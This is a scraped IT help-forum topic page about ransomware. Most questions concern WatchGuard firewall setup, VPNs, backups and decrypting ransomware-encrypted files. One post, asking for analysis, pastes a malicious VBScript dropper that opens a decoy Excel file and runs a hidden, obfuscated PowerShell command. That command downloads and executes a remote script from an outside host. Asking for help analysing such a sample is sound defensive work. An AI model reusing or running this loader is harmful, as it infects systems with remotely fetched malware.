Ransomware

158

Solutions

408

Contributors

Ransomware is malicious software, designed to block data access in order to extort money. As a form of malware, ransomware is most often used to infiltrate devices through infected emails or links that, in turn, recognize and take advantage of vulnerabilities in the operating system and installed third-party software.


Software recommendation for Bare Metal Restore of Dissimilar Hardware.  I have an older Asus VivoBook S500C running current version of Windows 10.  I would like to purchase a new laptop and do an image restore without starting from scratch reinstalling individual software packages.
0

We've just installed a new next-gen firewall and I need some assistance getting some communication between two of the interfaces.
It's a Watchguard T35 and we have our WAN on Eth0, LAN1 on Eth1, and LAN2 on Eth2.
Our WAN has a static IP, but we have a /27 block of public IPs routed (at the ISP level) to our WAN for use by public-facing servers.

I have that part of it working OK.  Servers connected to the LAN2 all have their static IP assignment and IP checks on the internet show the correct IPs.  This interface in the Watchguard is set as "Optional".

LAN1, is our private LAN and is set as "Trust".  Internet traffic and NAT/port forwarding is all working OK, but I cannot seem to get access to LAN2 from LAN1 devices.

I've created a firewall policy with "ANY" for the packet filtering and have set both 192.168.1.0/24 and 203.xx.xx.0/27 in both the To and From boxes.  The rule is set to allow and enabled.
But I cannot browse (using the IP or UNC name) or access any of the LAN2 resources from LAN1.  Nor can LAN2 access any of the LAN1 resources.

I'm new to Watchguard and thought I might ask here for any things I may have overlooked before lodging a support ticket with Watchguard support.
1
I am installing WatchGuard SSL VPN software, which uses OpenVPN software and has a TAP network driver, but I can't install it unattended. Does anybody know how to install OpenVPN unattended, including the TAP-Windows adapter?
0
Dear Team,
   My Domain Controller SYSVOL folder is affected by ransomware. The DC is working fine now.
How do I recreate the SYSVOL files? I have only one DC and no backup.

Server OS is Windows 2012.
I cannot reinstall the DC since I have my Exchange running.
0
I have a WatchGuard M270. The customer has a hosted server they connect to via IPsec. What policy could I enable to allow the IPsec VPN outbound?
0
Hasn’t happened but just wondering

If my Google Drive got hit and all files were encrypted, can I revert back to last week's clean files?

So I’m asking: does Google Drive afford any sort of fallback plan for this scenario?

Thanks
2
I have a user who is using the Watchguard VPN client software. They have been using it on Windows 10 Pro (v 1709) for 6 months without issue. The UAC prompt suddenly started appearing this morning when they try to run the software. No updates for Windows or the software have been installed. I have 60 other users that are using it without this problem also. I am at a loss as to why this would suddenly start needing elevated privileges to run. Does anyone know why this would happen or how to fix it? I am not going to disable user account control or give them admin rights.
0
hello all,

I am an owner of a small business in my town. I got infected by a ransomware with the .rapid extension; he wants a big ransom that I can't pay.
Any solution for this version? Please help.
0
I have Acronis for backups to tape.  I want to be able to backup "System State" of my DC.  What files or folders do I need to make sure get backed up?
0
I had this question after viewing Watchguard Firewall xFlow Configuration.
0

Customer has a WatchGuard T10 Firebox firewall for a POS system.  The POS server connects directly to the trusted network port. No other computers connect to that network.

Customer wants to set up an access point for Wi-Fi.  The WatchGuard has a 3rd port.  I want to activate it as a second network and allow wireless devices to access the internet.

The WatchGuard firewall does not have built-in Wi-Fi.  We purchased an access point that we plan to connect to the 3rd port.

This is a restaurant; there are no office PCs or network printers.

Need suggestions on policies; the device has content filter subscriptions.  I want to enforce them on the 3rd port too if possible.
0
We believe a client has been hacked but can't determine what the VBScript is doing to the data; it doesn't look like ransomware.
Can you help point us in a direction to what degree this hack could be?

Below is the VBScript and a picture of a folder it has been found in. You will see that the actual Excel doc has been hidden and a fake Excel doc is in its place. It looks like when the fake Excel doc is run, it opens up the VBScript and the hidden Excel doc.

VBscript
Set fso = CreateObject("Scripting.FileSystemObject")
Set shl = CreateObject("WScript.Shell")
Set shp = CreateObject("WScript.Shell")
path=shl.ExpandEnvironmentStrings("%APPDATA%")+"\"+GetUUID(".")
exists = fso.FolderExists(path)
Set objFile = fso.GetFile(Wscript.ScriptFullName)
rr = fso.GetParentFolderName(objFile)+"\Project 8192 LNG STS System Certification Log.xlsx"
if (exists) then
shl.Run("explorer.exe "+rr+"")
Else
shl.Run("explorer.exe "+rr+"")
shp.Run "powershell.exe  -windowstyle hidden -executionpolicy bypass -command iex((nEw-ObJect ('NEt.WeBclient')).('DowNLoAdStrInG').invoKe(('https://cflfuppn.eu/sload/2.0/netF.ps1')))",0,True
Set shp = Nothing
end if
Function GetUUID(strComputer)
Dim objWmi, colItems, objItem, strUUID, blnValidUUID
Set objWmi = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWmi.ExecQuery("Select * from Win32_ComputerSystemProduct")
strUUID = ""
blnValidUUID = False
For Each objItem in colItems
strUUID = objItem.UUID
If Not …
0
How to block RFC 1918 and create object-groups and use that object-groups to block any udp traffic inbound to the external interface on a WatchGuard Firebox (M200)?
0
We have a WatchGuard M200 firewall on which we would like to limit inbound/outbound bandwidth to 20Mbps on our External (WAN) interface. Our ISP allows for 40Mbps total bandwidth. I've gone into Traffic Management and changed the interface to limit bandwidth to 20Mbps, but this only seems to apply to upstream outbound traffic. Inbound traffic is still coming in at the full 40Mbps. Is it possible to also limit inbound traffic to 20Mbps?

Thank you
0
Hi!
I'm trying to use the program by James-Gourley to decrypt a 1.4.0.0 version of Cryakl. Some files are decrypted correctly, and other files are not decrypted, with an "encryption signature mismatch" message. Help me please. Sample files https://dropmefiles.com/769Q7   More examples of unencrypted files https://dropmefiles.com/CZ7xH
0
Need help with decrypting files after Cryakl 1.5.1.
Encrypted and original file attached.
0
I have an urgent issue and can't seem to find an answer. 

The client has Server 2012. A software VPN is set up, which is no longer working.
The server had GDATA installed, which I removed, and reinstalled Webroot. Then restarted the server.

Since this I have not been able to get the VPN working again. I have tried running removal tools for Webroot and GDATA and disabled the Windows firewall; however, no success at all. Still no VPN access.

Does anyone have any suggestions ? 

Error is

The network connection between your computer and the VPN server could not be established because the remote server is not responding. This could be because one of the network devices (e.g, firewalls, NAT, routers, etc) between your computer and the remote server is not configured to allow VPN connections. Please contact your Administrator or your service provider to determine which device may be causing the problem.
0
I am having an issue accessing a secure ftp web site from a network.  The network uses a watchguard xtm 25 appliance and then runs Server 2008 R2 as the network server.  The workstations are all Windows 7 Pro.

The URL is https://oebsftp.ontarioenergyboard.ca.  This should bring me to a log in page, but instead the following message

The message from IE 11 is as follows:

This page can’t be displayed


Turn on TLS 1.0, TLS 1.1, and TLS 1.2 in Advanced settings and try connecting to https://oebsftp.ontarioenergyboard.ca  again. If this error persists, it is possible that this site uses an unsupported protocol or cipher suite such as RC4 (link for the details), which is not considered secure. Please contact your site administrator.

Firefox gives the following:
Secure Connection Failed

The connection to oebsftp.ontarioenergyboard.ca was interrupted while the page was loading.

    The page you are trying to view cannot be shown because the authenticity of the received data could not be verified.
    Please contact the website owners to inform them of this problem.
Often the Ontario energy board upload sites are designed for IE only.

I do not see anything in the Watchguard appliance but may be overlooking something.

The server uses SEP 14.0 for both anti-virus and Firewall

As a separate issue, email using Outlook 2013 cannot use ssl either
0
Hi James ..... I'm back here .... Sadly
I've another computer infected with Fairytail .... I think it's the same version that I cleaned earlier.
I've just downloaded your decryptor but I think something went wrong with it.
The earlier version worked fine with me .... but this one seems to give me some trouble. I used it on 3 different PCs and I received the same error. All of them were running Windows 10 64-bit.
I have a clean file and the same file encrypted to use in the decryptor.
But as soon as I select the encrypted file, I receive the error I attach.
0

We have a WatchGuard M300. We currently have an internet connection that is too small for our needs. Our issue is the upload speed is capped at 20Mbps. With the M300 can we add a second internet connection and have our internet traffic divided evenly between these two connections?
0
Hi All

This is not a question as such; I'm looking for information and ideas on how I can pass VLANs across an IPsec VPN tunnel.

I've got 16 VLANs that are hosted at one site located a few hundred kilometers away from my secondary site, and I want to be able to push the VLANs from the main site to the secondary site and then be able to distribute those via a switch at the remote site.

The sites currently will be connected via either Sonicwalls or WatchGuard UTM Appliances

Any help or suggestions on this would be greatly appreciated
0
Dear All,

A friend of mine's company server got hijacked by embassy@scryptmail.com using Disk-crypt. After much negotiation we got the codes (reduced prices £4000 to £300), so the laptops have all been decrypted. The server, a Dell using a RAID 1 mirror on a PERC S300 controller, hasn’t been straightforward; eventually I worked out how I had to boot from an alternate SSD with driver an SMB server 2011 etc. I’ve now decrypted the drives even though the server boot BSODs (sort later), but does anyone know how to remove the demand at boot from the MBR for the password, please?

Regards
D
0
Hello Experts,

I have an XTM 26 series WatchGuard firewall in the company. We are now in the phase of upgrading internet bandwidth from 20 Mbps to 100 Mbps.  According to the service provider, I have to set up the firewall for traffic shaping, but I am not sure whether WatchGuard supports it or not.

Parameters to configure on the firewall are: Shaping Rate, Shaping burst, Extended burst.

I do not want to go with the other option of adding a router before the firewall, as it may stop all applications running in the branch office.

Can anybody help me with this?
0
WatchGuard to DrayTek site-to-site VPN - 2 tunnels required.

The WG side has a local IP of 192.168.1.1/24 and this needs linking to the DrayTek, which has 2 LANs: 10.0.0.1/24 and 192.168.100.1/24.

I need a tunnel for both.

Now I can set this up with one tunnel, no issue, but can't see anywhere to add a second tunnel on the DrayTek end. I've heard GRE might be the answer to my question but haven't used this before.

How do I add a second tunnel? I have also tried a second VPN with the other tunnel, but this causes both VPNs to alternate and not work correctly. Any help or questions welcome.
0
I currently have a WatchGuard Firebox with UTM and am using VMware.
I'm currently upgrading the environment to the latest VMware and NSX.
Is it recommended to eliminate the WatchGuard and ONLY use NSX?
0
